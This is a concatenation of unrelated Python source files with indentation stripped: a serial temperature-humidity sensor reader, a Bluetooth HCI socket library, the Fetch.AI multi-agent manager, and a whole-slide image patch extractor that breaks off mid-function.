- last, caculate "log10(energy_of__t0~tn) * 10" to get Leq of this time period (dB(A))
"""
"""
def transfer_to_eng(x):
Lf = math.pow(10,(x/5))
return Lf
"""
def get_temp_data():
#global slot_count, slot_energy, Leq, time_slot_string
#global Leq_Max, Leq_Min, Leq_Median, dba_windows
global temp_data,rh_data
while True:
#ser = serial.Serial(MIC_COM_PORT, BAUD_RATES)
try:
ser = serial.Serial(MIC_COM_PORT, BAUD_RATES)
#last_time_stamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S").split(" ")[1]
while True:
#time_stamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S").split(" ")[1]
#if(time_stamp == last_time_stamp):
if(1):
while ser.in_waiting:
data_raw = ser.readline()
data = data_raw.decode()
#input data: Temp:24.57,Humidity:51.82
data_set = data.strip().split(",")
#caculate dba to energy
#slot_energy = slot_energy + transfer_to_eng(float(data_set[1]))
temp_data = float(data_set[0].split(":")[1])
rh_data = float(data_set[1].split(":")[1])
#print("------------------")
#print(temp_data)
#print(rh_data)
#print("------------------")
#time_slot_string = time_slot_string + str(data_set[1]) + ","
#slot_count = slot_count + 1
#else:
#transfer back to dba / Leq in 1 seconds
#Leq = math.log10(math.sqrt(slot_energy / slot_count)) * 10
#limited to 2 places
#Leq = round(Leq,2)
#dba_windows.append(Leq)
#Leq_Max = max(dba_windows)
#Leq_Min = min(dba_windows)
#Leq_Median = round(median(dba_windows),2)
#print("Leq: " + str(Leq) + "\n")
#print("------------------")
#print("Leq: " + str(Leq) + "\n")
#print("Leq_Max: " + str(Leq_Max) + "\n")
#print("Leq_Min: " + str(Leq_Min) + "\n")
#print("Leq_Median: " + str(Leq_Median) + "\n")
#print("------------------")
#time_slot_string = ""
#slot_energy = 0
#slot_count = 0
#temp_data = 0
#rh_data = 0
#last_time_stamp = time_stamp
except:
ser.close()
#clear remain data
#dba_windows.clear()
#Leq = 0
#Leq_Max = 0
#Leq_Min = 0
#Leq_Median = 0
temp_data = 0
rh_data = 0
time.sleep(5)
#print('no MIC or port error!\n')
#traceback.print_exc()
#start MIC sensing
get_temp_data_t = threading.Thread(target = get_temp_data)
get_temp_data_t.setDaemon(True)
get_temp_data_t.start()
|
BluetoothHCI.py
|
#!/usr/bin/python
# Bluetooth HCI Python library (Experimental)
#
# Pure Python and standard library based module for interacting with the Bluetooth HCI.
# There is no dependency on the PyBluez Python/Native libraries, bluetoothd service or D-Bus.
# This can be considered to be a Pythonisation of the NodeJS NoBLE/ BLENo by Sandeep Mistry.
# Author: Wayne Keenan
# email: wayne@thebubbleworks.com
# Twitter: https://twitter.com/wkeenan
# Acknowledgements:
# Significant information taken from https://github.com/sandeepmistry/node-bluetooth-hci-socket
# With help from https://github.com/colin-guyon/py-bluetooth-utils and the BlueZ Python library.
import array
import struct
import fcntl
import socket
import threading
try:
import thread
except ImportError:
import _thread
from threading import Event
import select
import os
import sys
from .BluetoothSocket import BluetoothSocket
from .constants import *
OGF_HOST_CTL = 0x03
OCF_RESET = 0x0003
# -------------------------------------------------
# Socket HCI transport API
# This socket based to the Bluetooth HCI.
# Strong candidate for refactoring into factory pattern to support
# alternate transports (e.g. serial) and easier mocking for automated testing.
class BluetoothHCISocketProvider:
def __init__(self, device_id=0):
self.device_id = device_id
self._keep_running = True
self._socket = None
self._socket_on_data_user_callback = None
self._socket_on_started = None
self._socket_poll_thread = None
self._l2sockets = {}
self._socket = BluetoothSocket(socket.AF_BLUETOOTH, socket.SOCK_RAW, socket.BTPROTO_HCI)
#self._socket = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_RAW, socket.BTPROTO_HCI)
#self._socket = BluetoothUserSocket()
#self._socket = bluetooth.bluez._gethcisock(0)
self._socket.setblocking(0)
self.__r, self.__w = os.pipe()
self._r = os.fdopen(self.__r, 'rU')
self._w = os.fdopen(self.__w, 'w')
def __del__(self):
self._keep_running = False
def open(self):
# TODO: specify channel: HCI_CHANNEL_RAW, HCI_CHANNEL_USER, HCI_CHANNEL_CONTROL
# https://www.spinics.net/lists/linux-bluetooth/msg37345.html
# self._socket.bind((self.device_id,))
HCI_CHANNEL_RAW = 0
HCI_CHANNEL_USER = 1
self._socket.bind_hci(self.device_id, HCI_CHANNEL_RAW)
#self._socket2.bind_l2(0, "0B:D8:28:EB:27:B8", cid=ATT_CID, addr_type=1)
#self._socket2.connect_l2(0, "0B:D8:28:EB:27:B8", cid=ATT_CID, addr_type=1)
#self.reset()
self._socket_poll_thread = threading.Thread(target=self._socket_poller, name='HCISocketPoller')
self._socket_poll_thread.setDaemon(True)
self._socket_poll_thread.start()
def kernel_disconnect_workarounds(self, data):
#print 'PRE KERNEL WORKAROUND %d' % len(data)
def noop(value):
return value
if (sys.version_info > (3, 0)):
ord = noop
else:
import __builtin__
ord = __builtin__.ord
if len(data) == 22 and [ord(elem) for elem in data[0:5]] == [0x04, 0x3e, 0x13, 0x01, 0x00]:
handle = ord(data[5])
# get address
set = data[9:15]
# get device info
dev_info = self.get_device_info()
raw_set = [ord(c) for c in set]
raw_set.reverse()
#addz = ''.join([hex(c) for c in set])
#set.reverse()
addz = "%02x:%02x:%02x:%02x:%02x:%02x" % struct.unpack("BBBBBB", array.array('B', raw_set))
socket2 = BluetoothSocket(socket.AF_BLUETOOTH, socket.SOCK_SEQPACKET, socket.BTPROTO_L2CAP)
socket2.bind_l2(0, dev_info['addr'], cid=ATT_CID, addr_type=0)#addr_type=dev_info['type'])
self._l2sockets[handle] = socket2
try:
result = socket2.connect_l2(0, addz, cid=ATT_CID, addr_type=ord(data[8]) + 1)
except:
pass
elif len(data) == 7 and [ord(elem) for elem in data[0:4]] == [0x04, 0x05, 0x04, 0x00]:
handle = ord(data[4])
socket2 = self._l2sockets[handle] if handle in self._l2sockets else None
if socket2:
# print 'GOT A SOCKET!'
socket2.close()
del self._l2sockets[handle]
def reset(self):
cmd = array.array('B', [0] * 4)
# // header
# cmd.writeUInt8(HCI_COMMAND_PKT, 0);
# cmd.writeUInt16LE(OCF_RESET | OGF_HOST_CTL << 10, 1);
# // length
# cmd.writeUInt8(0x00, 3);
struct.pack_into("<BHB", cmd, 0, HCI_COMMAND_PKT, OCF_RESET | OGF_HOST_CTL << 10, 0x00)
#debug('reset');
self.write_buffer(cmd);
def close(self):
self._socket.close()
def send_cmd(self, cmd, data):
arr = array.array('B', data)
fcntl.ioctl(self._socket.fileno(), cmd, arr)
return arr
def send_cmd_value(self, cmd, value):
fcntl.ioctl(self._socket.fileno(), cmd, value)
def write_buffer(self, data):
self._socket.send(data)
def set_filter(self, data):
# flt = bluez.hci_filter_new()
# bluez.hci_filter_all_events(flt)
# bluez.hci_filter_set_ptype(flt, bluez.HCI_EVENT_PKT)
self._socket.setsockopt( socket.SOL_HCI, socket.HCI_FILTER, data )
pass
#self._socket.setsockopt(socket.SOL_HCI, socket.HCI_FILTER, data)
def invoke(self, callback):
event = Event()
self._msg = (event, callback)
self._w.write(" ")
event.wait()
def _socket_poller(self):
if self._socket_on_started:
self._socket_on_started()
while self._keep_running:
readable, writable, exceptional = select.select([self._socket, self._r], [], [])
for s in readable:
if s == self._r:
self._r.read(1)
self._msg[1]()
self._msg[0].set()
self._msg = None
elif s == self._socket:
data = self._socket.recv(1024) # blocking
self.kernel_disconnect_workarounds(data)
if self._socket_on_data_user_callback:
self._socket_on_data_user_callback(bytearray(data))
def on_started(self, callback):
self._socket_on_started = callback
def on_data(self, callback):
self._socket_on_data_user_callback = callback
def get_device_info(self):
# C hci_dev_info struct defined at https://git.kernel.org/pub/scm/bluetooth/bluez.git/tree/lib/hci.h#n2382
hci_dev_info_struct = struct.Struct('=H 8s 6B L B 8B 3L 4I 10L')
request_dta = hci_dev_info_struct.pack(
self.device_id,
b'',
0, 0, 0, 0, 0, 0,
0,
0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0,
0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
response_data = self.send_cmd(HCIGETDEVINFO, request_dta)
hci_dev_info = hci_dev_info_struct.unpack(response_data)
# Just extract a few parts for now
device_id = hci_dev_info[0]
device_name = hci_dev_info[1].split(b'\0',1)[0]
bd_addr = "%0x:%0x:%0x:%0x:%0x:%0x" % hci_dev_info[7:1:-1]
type = hci_dev_info[4]
return dict(id=device_id,
name=device_name,
addr=bd_addr,
type=type)
class BluetoothHCI:
def __init__(self, device_id=0, auto_start = True):
# TODO: be given a provider interface from a factory (e.g. socket, serial, mock)
self.hci = BluetoothHCISocketProvider(device_id)
if auto_start:
self.start()
# -------------------------------------------------
# Public HCI API, simply delegates to the composite HCI provider
def start(self):
self.hci.open()
def stop(self):
self.hci.close()
def on_started(self, callback):
self.hci.on_started(callback)
def invoke(self, callback):
self.hci.invoke(callback)
def send_cmd(self, cmd, data):
return self.hci.send_cmd(cmd, data)
# packet type struct : https://git.kernel.org/pub/scm/bluetooth/bluez.git/tree/lib/hci.h#n117
# typedef struct {
# uint16_t opcode; /* OCF & OGF */
# uint8_t plen;
# } __attribute__ ((packed)) hci_command_hdr;
# Op-code (16 bits): identifies the command:
# OGF (Op-code Group Field, most significant 6 bits);
# OCF (Op-code Command Field, least significant 10 bits)."""
def send_cmd_value(self, cmd, value):
self.hci.send_cmd_value(cmd, value)
def write(self, data):
self.hci.write_buffer(data)
def set_filter(self, data):
#self.device_down()
self.hci.set_filter(data)
#self.device_up()
def on_data(self, callback):
self.hci.on_data(callback)
# -------------------------------------------------
# Public HCI Convenience API
def device_up(self):
self.send_cmd_value(HCIDEVUP, self.hci.device_id)
def device_down(self):
self.send_cmd_value(HCIDEVDOWN, self.hci.device_id)
def get_device_info(self):
# C hci_dev_info struct defined at https://git.kernel.org/pub/scm/bluetooth/bluez.git/tree/lib/hci.h#n2382
hci_dev_info_struct = struct.Struct('=H 8s 6B L B 8B 3L 4I 10L')
request_dta = hci_dev_info_struct.pack(
self.hci.device_id,
b'',
0, 0, 0, 0, 0, 0,
0,
0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0,
0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
response_data = self.send_cmd(HCIGETDEVINFO, request_dta)
hci_dev_info = hci_dev_info_struct.unpack(response_data)
# Just extract a few parts for now
device_id = hci_dev_info[0]
device_name = hci_dev_info[1].split(b'\0',1)[0]
bd_addr = "%0x:%0x:%0x:%0x:%0x:%0x" % hci_dev_info[7:1:-1]
return dict(id=device_id,
name=device_name,
addr=bd_addr)
|
manager.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2020 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the implementation of AEA agents manager."""
import asyncio
import json
import os
import threading
from asyncio.tasks import FIRST_COMPLETED
from shutil import rmtree
from threading import Thread
from typing import Any, Callable, Dict, List, Optional, Set, Tuple
from aea.aea import AEA
from aea.configurations.constants import DEFAULT_REGISTRY_NAME
from aea.configurations.data_types import PublicId
from aea.manager.project import AgentAlias, Project
class AgentRunAsyncTask:
"""Async task wrapper for agent."""
def __init__(self, agent: AEA, loop: asyncio.AbstractEventLoop) -> None:
"""Init task with agent and loop."""
self.run_loop: asyncio.AbstractEventLoop = loop
self.caller_loop: asyncio.AbstractEventLoop = loop
self._done_future: Optional[asyncio.Future] = None
self.task: Optional[asyncio.Task] = None
self.agent = agent
def create_run_loop(self) -> None:
"""Create run loop."""
def start(self) -> None:
"""Start task."""
self.create_run_loop()
self.task = self.run_loop.create_task(self._run_wrapper())
self._done_future = asyncio.Future(loop=self.caller_loop)
def wait(self) -> asyncio.Future:
"""Return future to wait task completed."""
if not self._done_future: # pragma: nocover
raise ValueError("Task not started!")
return self._done_future
def stop(self) -> None:
"""Stop task."""
if not self.run_loop or not self.task: # pragma: nocover
raise ValueError("Task was not started!")
self.run_loop.call_soon_threadsafe(self.task.cancel)
async def _run_wrapper(self) -> None:
"""Run task internals."""
if not self._done_future: # pragma: nocover
raise ValueError("Task was not started! please use start method")
exc = None
try:
await self.run()
except asyncio.CancelledError: # pragma: nocover
pass
except Exception as e: # pylint: disable=broad-except
exc = e
finally:
self.caller_loop.call_soon_threadsafe(self._set_result, exc)
def _set_result(self, exc: Optional[BaseException]) -> None:
"""Set result of task execution."""
if not self._done_future or self._done_future.done(): # pragma: nocover
return
if exc:
self._done_future.set_exception(exc)
else:
self._done_future.set_result(None)
async def run(self) -> None:
"""Run task body."""
self.agent.runtime.set_loop(self.run_loop)
await self.agent.runtime.run()
@property
def is_running(self) -> bool:
"""Return is task running."""
return not self.wait().done()
class AgentRunThreadTask(AgentRunAsyncTask):
"""Threaded wrapper to run agent."""
def __init__(self, agent: AEA, loop: asyncio.AbstractEventLoop) -> None:
"""Init task with agent and loop."""
AgentRunAsyncTask.__init__(self, agent, loop)
self._thread: Optional[Thread] = None
def create_run_loop(self) -> None:
"""Create run loop."""
self.run_loop = asyncio.new_event_loop()
def start(self) -> None:
"""Run task in a dedicated thread."""
super().start()
self._thread = threading.Thread(
target=self.run_loop.run_until_complete, args=[self.task], daemon=True
)
self._thread.start()
class MultiAgentManager:
"""Multi agents manager."""
MODES = ["async", "threaded"]
DEFAULT_TIMEOUT_FOR_BLOCKING_OPERATIONS = 60
SAVE_FILENAME = "save.json"
def __init__(
self,
working_dir: str,
mode: str = "async",
registry_path: str = DEFAULT_REGISTRY_NAME,
) -> None:
"""
Initialize manager.
:param working_dir: directory to store base agents.
"""
self.working_dir = working_dir
self._save_path = os.path.join(self.working_dir, self.SAVE_FILENAME)
self.registry_path = registry_path
self._was_working_dir_created = False
self._is_running = False
self._projects: Dict[PublicId, Project] = {}
self._versionless_projects_set: Set[PublicId] = set()
self._keys_dir = os.path.abspath(os.path.join(self.working_dir, "keys"))
self._agents: Dict[str, AgentAlias] = {}
self._agents_tasks: Dict[str, AgentRunAsyncTask] = {}
self._thread: Optional[Thread] = None
self._loop: Optional[asyncio.AbstractEventLoop] = None
self._event: Optional[asyncio.Event] = None
self._error_callbacks: List[Callable[[str, BaseException], None]] = []
if mode not in self.MODES:
raise ValueError(
f'Invalid mode {mode}. Valid modes are {", ".join(self.MODES)}'
)
self._started_event = threading.Event()
self._mode = mode
@property
def is_running(self) -> bool:
"""Is manager running."""
return self._is_running
@property
def dict_state(self) -> Dict[str, Any]:
"""Create MultiAgentManager dist state."""
return {
"projects": [str(public_id) for public_id in self._projects.keys()],
"agents": [alias.dict for alias in self._agents.values()],
}
def _run_thread(self) -> None:
"""Run internal thread with own event loop."""
self._loop = asyncio.new_event_loop()
self._event = asyncio.Event(loop=self._loop)
self._loop.run_until_complete(self._manager_loop())
async def _manager_loop(self) -> None:
"""Await and control running manager."""
if not self._event: # pragma: nocover
raise ValueError("Do not use this method directly, use start_manager.")
self._started_event.set()
while self._is_running:
agents_run_tasks_futures = {
task.wait(): agent_name
for agent_name, task in self._agents_tasks.items()
}
wait_tasks = list(agents_run_tasks_futures.keys()) + [self._event.wait()] # type: ignore
done, _ = await asyncio.wait(wait_tasks, return_when=FIRST_COMPLETED)
if self._event.is_set():
self._event.clear()
for task in done:
if task not in agents_run_tasks_futures:
# task not in agents_run_tasks_futures, so it's event_wait, skip it
await task
continue
agent_name = agents_run_tasks_futures[task]
self._agents_tasks.pop(agent_name)
if task.exception():
for callback in self._error_callbacks:
callback(agent_name, task.exception())
else:
await task
def add_error_callback(
self, error_callback: Callable[[str, BaseException], None]
) -> None:
"""Add error callback to call on error raised."""
self._error_callbacks.append(error_callback)
def start_manager(self, local: bool = True) -> "MultiAgentManager":
"""Start manager."""
if self._is_running:
return self
self._ensure_working_dir()
self._load_state(local=local)
self._started_event.clear()
self._is_running = True
self._thread = Thread(target=self._run_thread, daemon=True)
self._thread.start()
self._started_event.wait(self.DEFAULT_TIMEOUT_FOR_BLOCKING_OPERATIONS)
return self
def stop_manager(
self, cleanup: bool = True, save: bool = False
) -> "MultiAgentManager":
"""
Stop manager.
Stops all running agents and stop agent.
:param cleanup: bool is cleanup on stop.
:param save: bool is save state to file on stop.
:return: None
"""
if not self._is_running:
return self
if not self._loop or not self._event or not self._thread: # pragma: nocover
raise ValueError("Manager was not started!")
if not self._thread.is_alive(): # pragma: nocover
return self
self.stop_all_agents()
if save:
self._save_state()
for agent_name in self.list_agents():
self.remove_agent(agent_name)
if cleanup:
for project in list(self._projects.keys()):
self.remove_project(project, keep_files=save)
self._cleanup(only_keys=save)
self._is_running = False
self._loop.call_soon_threadsafe(self._event.set)
if self._thread.ident != threading.get_ident():
self._thread.join(self.DEFAULT_TIMEOUT_FOR_BLOCKING_OPERATIONS)
self._thread = None
return self
def _cleanup(self, only_keys: bool = False) -> None:
"""Remove workdir if was created."""
if only_keys:
rmtree(self._keys_dir)
else:
if self._was_working_dir_created and os.path.exists(self.working_dir):
rmtree(self.working_dir)
def add_project(
self, public_id: PublicId, local: bool = True, restore: bool = False
) -> "MultiAgentManager":
"""
Fetch agent project and all dependencies to working_dir.
:param public_id: the public if of the agent project.
:param local: whether or not to fetch from local registry.
:param restore: bool flag for restoring already fetched agent.
"""
if public_id.to_any() in self._versionless_projects_set:
raise ValueError(
f"The project ({public_id.author}/{public_id.name}) was already added!"
)
self._versionless_projects_set.add(public_id.to_any())
project = Project.load(
self.working_dir,
public_id,
local,
registry_path=self.registry_path,
is_restore=restore,
)
if not restore:
project.install_pypi_dependencies()
project.build()
self._projects[public_id] = project
return self
def remove_project(
self, public_id: PublicId, keep_files: bool = False
) -> "MultiAgentManager":
"""Remove agent project."""
if public_id not in self._projects:
raise ValueError(f"Project {public_id} is not present!")
if self._projects[public_id].agents:
raise ValueError(
f"Can not remove projects with aliases exists: {self._projects[public_id].agents}"
)
project = self._projects.pop(public_id)
self._versionless_projects_set.remove(public_id.to_any())
if not keep_files:
project.remove()
return self
def list_projects(self) -> List[PublicId]:
"""
List all agents projects added.
:return: list of public ids of projects
"""
return list(self._projects.keys())
def add_agent(
self,
public_id: PublicId,
agent_name: Optional[str] = None,
agent_overrides: Optional[dict] = None,
component_overrides: Optional[List[dict]] = None,
) -> "MultiAgentManager":
"""
Create new agent configuration based on project with config overrides applied.
Alias is stored in memory only!
:param public_id: base agent project public id
:param agent_name: unique name for the agent
:param agent_overrides: overrides for agent config.
:param component_overrides: overrides for component section.
:param config: agent config (used for agent re-creation).
:return: manager
"""
agent_name = agent_name or public_id.name
if agent_name in self._agents:
raise ValueError(f"Agent with name {agent_name} already exists!")
if public_id not in self._projects:
raise ValueError(f"{public_id} project is not added!")
project = self._projects[public_id]
agent_alias = AgentAlias(
project=project, agent_name=agent_name, keys_dir=self._keys_dir,
)
agent_alias.set_overrides(agent_overrides, component_overrides)
project.agents.add(agent_name)
self._agents[agent_name] = agent_alias
return self
def add_agent_with_config(
self, public_id: PublicId, config: List[dict], agent_name: Optional[str] = None,
) -> "MultiAgentManager":
"""
Create new agent configuration based on project with config provided.
Alias is stored in memory only!
:param public_id: base agent project public id
:param agent_name: unique name for the agent
:param config: agent config (used for agent re-creation).
:return: manager
"""
agent_name = agent_name or public_id.name
if agent_name in self._agents: # pragma: nocover
raise ValueError(f"Agent with name {agent_name} already exists!")
if public_id not in self._projects: # pragma: nocover
raise ValueError(f"{public_id} project is not added!")
project = self._projects[public_id]
agent_alias = AgentAlias(
project=project, agent_name=agent_name, keys_dir=self._keys_dir,
)
agent_alias.set_agent_config_from_data(config)
project.agents.add(agent_name)
self._agents[agent_name] = agent_alias
return self
def get_agent_overridables(self, agent_name: str) -> Tuple[Dict, List[Dict]]:
"""
Get agent config overridables.
:param agent_name: str
:return: Tuple of agent overridables dict and and list of component overridables dict.
"""
if agent_name not in self._agents: # pragma: nocover
raise ValueError(f"Agent with name {agent_name} does not exist!")
return self._agents[agent_name].get_overridables()
def set_agent_overrides(
self,
agent_name: str,
agent_overides: Optional[Dict],
components_overrides: Optional[List[Dict]],
) -> None:
"""
Set agent overrides.
:param agent_name: str
:param agent_overides: optional dict of agent config overrides
:param components_overrides: optional list of dict of components overrides
:return: None
"""
if agent_name not in self._agents: # pragma: nocover
raise ValueError(f"Agent with name {agent_name} does not exist!")
if self._is_agent_running(agent_name): # pragma: nocover
raise ValueError("Agent is running. stop it first!")
self._agents[agent_name].set_overrides(agent_overides, components_overrides)
def list_agents_info(self) -> List[Dict[str, Any]]:
"""
List agents detailed info.
:return: list of dicts that represents agent info: public_id, name, is_running.
"""
return [
{
"agent_name": agent_name,
"public_id": str(alias.project.public_id),
"is_running": self._is_agent_running(agent_name),
}
for agent_name, alias in self._agents.items()
]
def list_agents(self, running_only: bool = False) -> List[str]:
"""
List all agents.
:param running_only: returns only running if set to True
:return: list of agents names
"""
if running_only:
return [i for i in self._agents.keys() if self._is_agent_running(i)]
return list(self._agents.keys())
def remove_agent(self, agent_name: str) -> "MultiAgentManager":
"""
Remove agent alias definition from registry.
:param agent_name: agent name to remove
:return: None
"""
if agent_name not in self._agents:
raise ValueError(f"Agent with name {agent_name} does not exist!")
if self._is_agent_running(agent_name):
raise ValueError("Agent is running. stop it first!")
agent_alias = self._agents.pop(agent_name)
agent_alias.remove_from_project()
return self
def start_agent(self, agent_name: str) -> "MultiAgentManager":
"""
Start selected agent.
:param agent_name: agent name to start
:return: None
"""
if not self._loop or not self._event: # pragma: nocover
raise ValueError("agent is not started!")
agent_alias = self._agents.get(agent_name)
if not agent_alias:
raise ValueError(f"{agent_name} is not registered!")
if self._is_agent_running(agent_name):
raise ValueError(f"{agent_name} is already started!")
agent_alias.issue_certificates()
aea = agent_alias.get_aea_instance()
# override build dir to project's one
aea.DEFAULT_BUILD_DIR_NAME = os.path.join(
agent_alias.project.path, aea.DEFAULT_BUILD_DIR_NAME
)
if self._mode == "async":
task = AgentRunAsyncTask(aea, self._loop)
elif self._mode == "threaded":
task = AgentRunThreadTask(aea, self._loop)
task.start()
self._agents_tasks[agent_name] = task
self._loop.call_soon_threadsafe(self._event.set)
return self
def _is_agent_running(self, agent_name: str) -> bool:
"""Return is agent running state."""
if agent_name not in self._agents_tasks:
return False
task = self._agents_tasks[agent_name]
return task.is_running
def start_all_agents(self) -> "MultiAgentManager":
"""
Start all not started agents.
:return: None
"""
self.start_agents(
[
agent_name
for agent_name in self.list_agents()
if not self._is_agent_running(agent_name)
]
)
return self
def stop_agent(self, agent_name: str) -> "MultiAgentManager":
"""
Stop running agent.
:param agent_name: agent name to stop
:return: None
"""
if not self._is_agent_running(agent_name) or not self._thread or not self._loop:
raise ValueError(f"{agent_name} is not running!")
agent_task = self._agents_tasks[agent_name]
if self._thread.ident == threading.get_ident(): # pragma: nocover
# In same thread do not perform blocking operations!
agent_task.stop()
return self
wait_future = agent_task.wait()
event = threading.Event()
def event_set(*args): # pylint: disable=unused-argument
event.set()
def _add_cb():
if wait_future.done():
event_set() # pragma: nocover
else:
wait_future.add_done_callback(event_set) # pramga: nocover
self._loop.call_soon_threadsafe(_add_cb)
agent_task.stop()
event.wait(self.DEFAULT_TIMEOUT_FOR_BLOCKING_OPERATIONS)
return self
def stop_all_agents(self) -> "MultiAgentManager":
"""
Stop all agents running.
:return: None
"""
agents_list = self.list_agents(running_only=True)
self.stop_agents(agents_list)
return self
def stop_agents(self, agent_names: List[str]) -> "MultiAgentManager":
"""
Stop specified agents.
:return: None
"""
for agent_name in agent_names:
if not self._is_agent_running(agent_name):
raise ValueError(f"{agent_name} is not running!")
for agent_name in agent_names:
self.stop_agent(agent_name)
return self
def start_agents(self, agent_names: List[str]) -> "MultiAgentManager":
"""
Stop specified agents.
:return: None
"""
for agent_name in agent_names:
self.start_agent(agent_name)
return self
def get_agent_alias(self, agent_name: str) -> AgentAlias:
"""
Return details about agent alias definition.
:return: AgentAlias
"""
if agent_name not in self._agents: # pragma: nocover
raise ValueError(f"Agent with name {agent_name} does not exist!")
return self._agents[agent_name]
def _ensure_working_dir(self) -> None:
"""Create working dir if needed."""
if not os.path.exists(self.working_dir):
os.makedirs(self.working_dir)
self._was_working_dir_created = True
if not os.path.isdir(self.working_dir): # pragma: nocover
raise ValueError(f"{self.working_dir} is not a directory!")
if not os.path.exists(self._keys_dir):
os.makedirs(self._keys_dir)
def _load_state(self, local: bool) -> None:
"""
Load saved state from file.
:param local: bool is local project and agents re-creation.
:return: None
:raises: ValueError if failed to load state.
"""
if not os.path.exists(self._save_path):
return
save_json = {}
with open(self._save_path) as f:
save_json = json.load(f)
if not save_json:
return # pragma: nocover
try:
for public_id in save_json["projects"]:
self.add_project(
PublicId.from_str(public_id), local=local, restore=True
)
for agent_settings in save_json["agents"]:
self.add_agent_with_config(
public_id=PublicId.from_str(agent_settings["public_id"]),
agent_name=agent_settings["agent_name"],
config=agent_settings["config"],
)
except ValueError as e: # pragma: nocover
raise ValueError(f"Failed to load state. {e}")
def _save_state(self) -> None:
"""
Save MultiAgentManager state.
:return: None.
"""
with open(self._save_path, "w") as f:
json.dump(self.dict_state, f, indent=4, sort_keys=True)
|
patch_extractor.py
|
import os
import numpy as np
import glob
import fire
import xml.etree.ElementTree as ET
from PIL import Image
from openslide import open_slide
import pandas as pd
from multiprocessing import Process
class BTPatchExtractor:
def __init__(self, file_path: str, output_path: str, asap_xml_path: str, overwrite: bool = False,
hotspot: bool = False, level: int = 0, lymph_patch_size: int = 300, tb_patch_size: int = 300,
matched_files_excel: str = None, n_threads=6):
"""
This Object extracts (patches of) an mrxs file to a png format.
:param file_path: string
path to the mrxs single file or folder of files.
:param output_path: string
path to the output folder. The output format is the same name as the mrxs file,
with an appendix if multiple patches are extracted.
:param asap_xml_path: string (optional)
Path to the coordinate xml files (created with ASAP) single file or folder of files
If not provided, the full image is converted into a png.
:param overwrite: bool (optional)
overides exisiting extracted patches (default is False)
:param hotspot: bool (optional)
set if hotspot should also be extracted (default False)
:param lymph_patch_size: int (optional)
size of the patch around the lymphocyte coordinates
:param tb_patch_size: int (optional)
size of the patch around the tumor bud coordinates
:param level: int (optional)
Level of the mrxs file that should be used for the conversion (default is 0).
:param matched_files_excel: str
Optional. If provided, then this file will be used to match the xmls to the mrxs file names
(specify info in MATCHED_EXEL_INFO)
"""
# initiate the mandatory elements
self.file_path = file_path
self.output_path = output_path
# instantiate optional parameters
self.coord_path = asap_xml_path
self.overwrite = overwrite
self.staining = 'CD8'
self.level = level
self.matched_files_excel = matched_files_excel
self.extract_hotspot = hotspot
self.lymph_patch_size = lymph_patch_size
self.tb_patch_size = tb_patch_size
self.n_threads = n_threads
self.groups = ['tumorbuds', 'lymphocytes', 'hotspot'] if self.extract_hotspot else ['tumorbuds', 'lymphocytes']
self.matched_excel_info = {'wsi_col': 'CD8 Filename', 'file_id_col': 'Algo coordinates text file ID', 'sheet_name': 'Masterfile',
'folder_col': 'Folder'}
@property
def output_path(self):
return self._output_path
@output_path.setter
def output_path(self, output_path):
# make the output folder if it does not exist
if not os.path.isdir(output_path):
os.makedirs(output_path)
self._output_path = output_path
@property
def wsi_files(self):
if os.path.isdir(self.file_path):
# if we have a matched excel
if self.matched_files_excel:
files = self.file_path
else:
files = glob.glob(os.path.join(self.file_path, f'*{self.staining}.mrxs')) + glob.glob(os.path.join(self.file_path, f'*{self.staining}.ndpi'))
return files
# if we have just a single file
elif os.path.isfile(self.file_path):
return [self.file_path]
@property
def coord_files(self):
if os.path.isdir(self.file_path):
# if we have a matched excel
if self.matched_files_excel:
files = self.coord_path
else:
files = glob.glob(os.path.join(self.coord_path, f'*{self.staining}*asap.xml'))
return files
# if we have just a single file
elif os.path.isfile(self.file_path):
return [self.coord_path]
@property
def files_to_process(self):
if self.matched_files_excel:
return self._get_matched_files_excel()
else:
# we only have one file to process
if len(self.wsi_files) == 1:
filename = os.path.splitext(os.path.basename(self.file_path))[0]
output_folder = os.path.join(self.output_path, filename)
# skip if overwrite = False and folder exists
if not self.overwrite and os.path.isdir(output_folder):
print(f'Folder {output_folder} already exists. Output saving is skipped. To overwrite add --overwrite.')
else:
return [(output_folder, self.file_path, self.coord_path)]
# we have multiple files to process
else:
# create a list of the paired mrxs and coordinate files
# only take files that have a corresponding coordinates file
files_to_process = []
for wsi_path in self.wsi_files:
filename = os.path.splitext(os.path.basename(wsi_path))[0]
output_folder = os.path.join(self.output_path, filename)
# skip if overwrite = False and folder exists
if not self.overwrite and os.path.isdir(output_folder):
print(
f'Folder {output_folder} already exists. Output saving is skipped. To overwrite add --overwrite.')
continue
checked = []
for coord_file in self.coord_files:
if filename in coord_file:
checked.append(coord_file)
if len(checked) != 1:
print(
f'File {filename}.mrxs does not have a / too many corresponding xml file/s. File will be skipped.')
else:
files_to_process.append((output_folder, wsi_path, checked.pop()))
return files_to_process
def _get_matched_files_excel(self):
files_to_process = []
df = self.parse_matched_files_excel()
error = []
for wsi_file, wsi_folder, xml_name in zip(df[self.matched_excel_info['wsi_col']],
df[self.matched_excel_info['folder_col']],
df[self.matched_excel_info['file_id_col']]):
output_files_folder_path = os.path.join(self.output_path, f'{xml_name}-level{self.level}')
wsi_path = os.path.join(self.wsi_files, os.path.join(wsi_folder, wsi_file))
xml_coord_path = os.path.join(self.coord_files, f'{xml_name}_output_asap.xml')
# check if files listed in excel actually exist
if not os.path.isfile(wsi_path):
print(f'WSI {wsi_path} not found (skipping file)')
error.append(wsi_path)
continue
if not os.path.isfile(xml_coord_path):
print(f'XML {xml_coord_path} not found (skipping file)')
error.append(xml_coord_path)
continue
# skip if output foler exists if overwrite = False
